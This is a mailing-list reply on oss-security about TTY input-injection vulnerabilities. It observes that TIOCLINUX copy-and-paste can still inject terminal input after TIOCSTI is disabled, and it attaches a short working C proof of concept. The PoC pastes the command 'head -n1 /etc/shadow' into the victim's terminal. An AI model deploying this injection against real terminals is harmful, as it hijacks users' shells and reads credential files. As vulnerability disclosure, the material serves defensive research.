[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: Re: [oss-security] TTY pushback vulnerabilities / TIOCSTI
From: Jakub Wilk <jwilk () jwilk ! net>
Date: 2023-03-14 10:36:26
Message-ID: 20230314103626.3ucbt2rjdfhjbe6t () jwilk ! net
[Download RAW message or body]
* Hanno Böck <hanno@hboeck.de>, 2023-03-14 09:51:
>In the 2017 post solar designer mentioned that the Linux kernel
>developers have multiple times rejected changes in the kernel.
I believe this is the post in question:
https://www.openwall.com/lists/oss-security/2017/06/03/9
>Starting with Kernel 6.2 it is possible to disable TIOCSTI (unset
>CONFIG_LEGACY_TIOCSTI).
Nice, but...
On Linux virtual terminals, it's possible to achieve pretty much the
same effect using TIOCLINUX, the ioctl used by gpm to implement
copy&pasting.
I've attached a minimal PoC. A more elaborate one is here:
https://github.com/jwilk/ttyjack
--
Jakub Wilk
["minittyjack.c" (text/x-csrc)]
#include <stdio.h>
#include <sys/ioctl.h>
#include <linux/tiocl.h>
#include <linux/vt.h>
int main(void)
{
printf("\33[H\33[2J");
printf("head -n1 /etc/shadow\n");
fflush(stdout);
struct {
char padding;
char subcode;
struct tiocl_selection sel;
} data = {
.subcode = TIOCL_SETSEL,
.sel = {
.xs = 1, .ys = 1,
.xe = 1, .ye = 1,
.sel_mode = TIOCL_SELLINE
}
};
ioctl(0, TIOCLINUX, &data.subcode);
data.subcode = TIOCL_PASTESEL;
ioctl(0, TIOCLINUX, &data.subcode);
}
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic